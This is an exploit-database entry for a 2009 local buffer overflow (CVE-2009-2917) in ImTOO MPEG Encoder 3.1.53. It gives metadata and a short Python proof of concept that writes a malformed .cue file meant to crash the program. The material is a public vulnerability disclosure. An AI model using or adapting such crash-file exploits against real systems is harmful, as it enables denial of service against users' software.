[] NeoSense

ImTOO MPEG Encoder 3.1.53 - '.cue' / '.m3u' Local Buffer Overflow (PoC)

Author: opt!x hacker
type: dos
platform: windows
port: 
date_added: 2009-08-05 
date_updated: 2010-09-17 
verified: 1 
codes: OSVDB-57256;CVE-2009-2917 
tags: 
aliases:  
screenshot_url: http://www.exploit-db.com/screenshots/idlt9500/9382.png 
application_url: http://www.exploit-db.com76995_mpeg-encoder.exe

#!/usr/bin/python
print "ImTOO MPEG Encoder 3.1.53 (.cue/.m3u) local stack overlow POC"
print " finded by : opt!x hacker <optix@9.cn> "
print "download: http://www.soft32.com/download/63-300154-1/mpeg-encoder.exe "
junk = "\x41"*4
# file=open("crash.m3u","w")
file=open("crash.cue","w")
file.write(junk)
file.close()

# milw0rm.com [2009-08-06]